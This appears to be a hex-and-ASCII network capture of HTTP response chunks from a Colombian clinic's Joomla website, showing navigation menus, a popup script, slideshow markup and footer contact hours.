                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2256INData Raw: 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gant
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2257INData Raw: 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69
                                                                                                                                                                                                                                                                        Data Ascii: ize-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><di
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2258INData Raw: 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: m g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2260INData Raw: 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: </ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2261INData Raw: 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d
                                                                                                                                                                                                                                                                        Data Ascii: -menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2262INData Raw: 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: -item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2264INData Raw: 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e
                                                                                                                                                                                                                                                                        Data Ascii: er" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2265INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2266INData Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: ss="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-men
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2268INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: s="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2269INData Raw: 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                        Data Ascii: tyle>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup backgro
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2270INData Raw: 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79
                                                                                                                                                                                                                                                                        Data Ascii: one', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancy
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2272INData Raw: 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69
                                                                                                                                                                                                                                                                        Data Ascii: (boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><i
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2273INData Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74
                                                                                                                                                                                                                                                                        Data Ascii: "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-butt
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2274INData Raw: 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: e/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2276INData Raw: 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: alistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2277INData Raw: 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72
                                                                                                                                                                                                                                                                        Data Ascii: e"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="por
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2278INData Raw: 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64 69 76 20 63
                                                                                                                                                                                                                                                                        Data Ascii: g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><div c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2280INData Raw: 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73
                                                                                                                                                                                                                                                                        Data Ascii: encin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br><s
